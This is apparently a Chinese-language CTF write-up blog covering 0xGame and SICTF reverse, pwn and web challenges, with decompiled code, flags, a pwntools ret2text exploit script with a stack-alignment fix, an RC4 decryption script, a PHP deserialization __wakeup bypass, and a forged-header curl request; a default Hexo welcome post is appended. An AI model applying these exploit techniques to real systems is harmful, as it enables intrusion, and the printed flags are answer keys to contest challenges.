week1

Re

数字筑基

​

else
  {
    sub_401020((char *)&byte_402210, Arglist[0]);
    v4 = "0xGame{5f4812eb-6dee-46ab-9910-92af643cd911}\n";
  }
  sub_401020(v4, Arglist[0]);
  system("pause");
  return 0;
}

0xGame{5f4812eb-6dee-46ab-9910-92af643cd911}

代码金丹

v3 = strcmp(Arglist, "0xGame{620bbfcb-e56f-4e6d-8069-9587e066130a}");
if ( v3 )
  v3 = v3 < 0 ? -1 : 1;
v4 = (char *)&unk_4021B0;
if ( !v3 )
  v4 = (char *)&byte_40217C;
sub_401020(v4, Arglist[0]);

0xGame{620bbfcb-e56f-4e6d-8069-9587e066130a}

网络元婴

mov     [rsp+1F0h+var_1D0], 30h ; '0'
mov     [rsp+1F0h+var_1CC], 78h ; 'x'
xor     ebx, ebx
mov     [rsp+1F0h+var_1C8], 47h ; 'G'
mov     [rsp+1F0h+var_1C4], 61h ; 'a'
mov     [rsp+1F0h+var_1C0], 6Dh ; 'm'
mov     [rsp+1F0h+var_1BC], 65h ; 'e'
mov     [rsp+1F0h+var_1B8], 7Bh ; '{'
mov     [rsp+1F0h+var_1B4], 37h ; '7'
mov     [rsp+1F0h+var_1B0], 31h ; '1'
mov     [rsp+1F0h+var_1AC], 30h ; '0'
mov     [rsp+1F0h+var_1A8], 37h ; '7'
mov     [rsp+1F0h+var_1A4], 65h ; 'e'
mov     [rsp+1F0h+var_1A0], 65h ; 'e'
mov     [rsp+1F0h+var_19C], 62h ; 'b'
mov     [rsp+1F0h+var_198], 38h ; '8'
mov     [rsp+1F0h+var_194], 2Dh ; '-'
mov     [rsp+1F0h+var_190], 36h ; '6'
mov     [rsp+1F0h+var_18C], 37h ; '7'
mov     [rsp+1F0h+var_188], 31h ; '1'
mov     [rsp+1F0h+var_184], 39h ; '9'
mov     [rsp+1F0h+var_180], 2Dh ; '-'
mov     [rsp+1F0h+var_17C], 34h ; '4'
mov     [rsp+1F0h+var_178], 39h ; '9'
mov     [rsp+1F0h+var_174], 38h ; '8'
mov     [rbp+0F0h+var_170], 32h ; '2'
mov     [rbp+0F0h+var_16C], 2Dh ; '-'
mov     [rbp+0F0h+var_168], 61h ; 'a'
mov     [rbp+0F0h+var_164], 30h ; '0'
mov     [rbp+0F0h+var_160], 33h ; '3'
mov     [rbp+0F0h+var_15C], 64h ; 'd'
mov     [rbp+0F0h+var_158], 2Dh ; '-'
mov     [rbp+0F0h+var_154], 39h ; '9'
mov     [rbp+0F0h+var_150], 38h ; '8'
mov     [rbp+0F0h+var_14C], 35h ; '5'
mov     [rbp+0F0h+var_148], 33h ; '3'
mov     [rbp+0F0h+var_144], 30h ; '0'
mov     [rbp+0F0h+var_140], 33h ; '3'
mov     [rbp+0F0h+var_13C], 33h ; '3'
mov     [rbp+0F0h+var_138], 35h ; '5'
mov     [rbp+0F0h+var_134], 64h ; 'd'
mov     [rbp+0F0h+var_130], 66h ; 'f'
mov     [rbp+0F0h+var_12C], 39h ; '9'
mov     [rbp+0F0h+var_128], 33h ; '3'
mov     [rbp+0F0h+var_124], 7Dh ; '}'

0xGame{7107eeb8-6719-4982-a03d-98530335df93}

虚拟化神

这里的逻辑是检测config.txt的值是不是==1, ==1输出flag，直接修改config中的值为1

while ( v5 );
fopen_s(&Stream, "config.txt", "r");
if ( Stream && (fgets(Buffer, 2, Stream), fclose(Stream), atoi(Buffer) == 1) )
{
  vfprintf1((char *)&byte_1400032B8);
  vfprintf1("%s\n", (const char *)v10);
}
else
{
  vfprintf1((char *)&byte_1400032E0);
  scanf("%s");
  if ( !strcmp(v15, (const char *)v10) )
  {
    fopen_s(&Stream, "config.txt", "w");
    vfprintf(Stream, "%d", (va_list)1);
    fclose(Stream);
    vfprintf1(byte_1400032F8);
  }
  else
  {
    fopen_s(&Stream, "config.txt", "w");
    vfprintf(Stream, "%d", 0i64);
    fclose(Stream);
    vfprintf1((char *)&byte_140003328);
  }
}

0xGame{c9fcd83d-e27a-4569-8ba1-62555b6dc6ac}

赛博天尊

这里需要 构造一个能跳过if判断的数据，这个数据就是flag，这个数据的构造方式就是解方程，这里有些很直观的约束条件，flag长度是44，求解的范围是0xGame

今天看一个ret2text的题目的时候，遇到了exp本地不通，远程通的奇怪问题，题目是这样的

有个backdoor函数是这样的

exp是这样的

from pwn import *
# p=remote("1.container.jingsai.apicon.cn",30509)
elf = context.binary = ELF('./Intruduce')
p = process()
context.log_level='debug'
payload=b'a'* (32 + 8)
backd00r=0x4011B6
payload+=p64(backd00r)
s=p.recvline() ; print(s)
print(s)
char=p.recv(1)
print(char)
p.sendline(payload)
p.interactive()

gdb调试了一下发现在call system的时候卡在了这个xmm寄存器里

搜索了一下，在这里找到了解决方法 https://blog.csdn.net/fjh1997/article/details/107695261

发现是glibc >= 2.27的时候 system函数里面会调用xmm寄存器，xmm寄存器要求16字节对齐，远程的环境应该是<2.27的所以可以直接打通，然后我本地的glibc版本是2.35的，所以会因为xmm寄存器内存对齐的原因导致exp打不通，只需要少push一个地址，内存就对齐了

一开始我是用4011B6这个地址，后面换成了4011BB就对齐了，然后本地就通了

from pwn import *
# p=remote("1.container.jingsai.apicon.cn",30509)
elf = context.binary = ELF('./Intruduce')
p = process()
context.log_level='debug'
payload=b'a'* (32 + 8)
backd00r=0x4011BB # old address 4011B6
payload+=p64(backd00r)
s=p.recvline() ; print(s)
print(s)
char=p.recv(1)
print(char)
p.sendline(payload)
p.interactive()

附件 https://github.com/nyyyddddn/ctf/tree/main/Sictf2023%20%23Round%202

Reverse

[签到]PYC

电脑上的pycdc出问题了，就找个在线的

https://www.lddgo.net/string/pyc-compile-decompile

print(‘SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}’)

Myobject

rc4加解密，写个脚本

def rc4(key, plaintext):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]  # Swap values
    i = 0
    j = 0
    output = []
    for byte in plaintext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]  
        K = S[(S[i] + S[j]) % 256]
        output.append(byte ^ K)

    return output
key = [ord(char) for char in "SIFLAG"]
v18_bytes = (0x47CF225A0ED32730).to_bytes(8, byteorder='little')
ciphertext_v19 = [71, 107, 11, 229, 141, 83, 186, 153, 195, 133, 7]
v20_bytes = (0x9F88FE10771C0107).to_bytes(8, byteorder='little')

full_ciphertext_27 = list(v18_bytes) + ciphertext_v19 + list(v20_bytes)

decrypted_full_combined = rc4(key, full_ciphertext_27)
decrypted_full_combined_string = ''.join([chr(byte) for byte in decrypted_full_combined])
print(decrypted_full_combined_string)

SICTF{wow_you_get_the_flag}

chbase

strcpy(Str2, "F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9");

char *sub_411B30()
{
  char *result; // eax

  __CheckForDebuggerJustMyCode(&unk_41C0F5);
  j_strcpy(&Destination, "ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/");
  result = (char *)IsDebuggerPresent();
  if ( result )
    return j_strcpy(&Destination, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
  return result;
}

base64换一下上面的索引表就解出来了

http://web.chacuo.net/netbasex

SICTF{base64_and_antidebugger}

不一样的base64

这个出题人怎么对base64情有独钟

pyinstaller打包的exe,我找了几个提取pyc的项目，就这个比较好用

https://github.com/pyinstxtractor/pyinstxtractor-ng/releases/tag/2023.08.20

然后把111.pyc 反编译一下

Web

[Baby] SignIn

查看源代码，script.js文件中有一段document.getElementById(‘flag’).addEventListener(‘click’, function()下面是一段jsfuck混淆

https://enkhee-osiris.github.io/Decoder-JSFuck/ 得到flag

[Baby] Backdoor

post传system()执行系统命令，找到flag

[Baby] Webpack

https://www.cnblogs.com/guowenrui/p/17023732.html 参考的这个文章

安装nodejs 用reverse-sourcemap .map文件还原找到flag

[Easy] Leak

.swp备份文件 vim -r还原得到flag

[Easy] ezhttp

传参的时候有些问题，像传host还有referer，可能是我这边安装的burp有问题，上网上查了一下发现curl也能传很多参数

curl -X CNSS -A "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Build/OPM1.171019.026; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4313 MMWEBSDK/20220604 Mobile Safari/537.36 MMWEBID/8603 MicroMessenger/8.0.24.2180(0x28001851) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64" -H "Referer: cnss.io" -H "X-Forwarded-For: 127.0.0.1" -H "Host: uestc.edu.cn" -H "Content-Type: application/json" -d "{\"name\": \"nyyyddddn\",\"password\" : \"123456\"}" -b "name=nyyyddddn;password=123456" -u nyyyddddn:123456 http://124.221.34.13:50005/Index

[Easy] ezunserialize

fssmsl网页那显示错误是unicode里面的LRI PDI RLO的原因，在ide里面没有这种问题，传参的时候转url编码传就行了，只需要改对象数量绕过__wakeup就拿到flag了

<?php
error_reporting(0);
show_source(__FILE__);
include "flag.php";

class CNSS
{
    public $username = 'admin';
    private $i_want2_say = '‮⁦fssmsl⁩⁦i_like_web';
    protected $password = 'ctf';
    
    function __wakeup()
    {
        $this->username = 'guest';
        $this->i_want2_say = 'i_like_web';
        $this->password = '123456';
        echo "<br/> wake up! <br/>";
    }
    
    function __destruct()
    {
        echo "destruct<br />";
        if ($this->username === 'admin' && $this->password === 'ctf' && $this->i_want2_say === '‮⁦fssmsl⁩⁦i_like_web') { //wtf
            global $flag;
            echo $flag;
        } else
            echo "you are 2 baby la<br/>";
    }
}

$aa = new CNSS();
$ss = serialize($aa);
$ss=str_replace('"CNSS":3','"CNSS":4',$ss);
echo urlencode($ss);

Re

[Baby] Welcome to Reverse World!

main函数那，一打开就有flag了

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

$ hexo new "My New Post"

More info: Writing

Run server

$ hexo server

More info: Server

Generate static files

$ hexo generate

More info: Generating

Deploy to remote sites

$ hexo deploy

More info: Deployment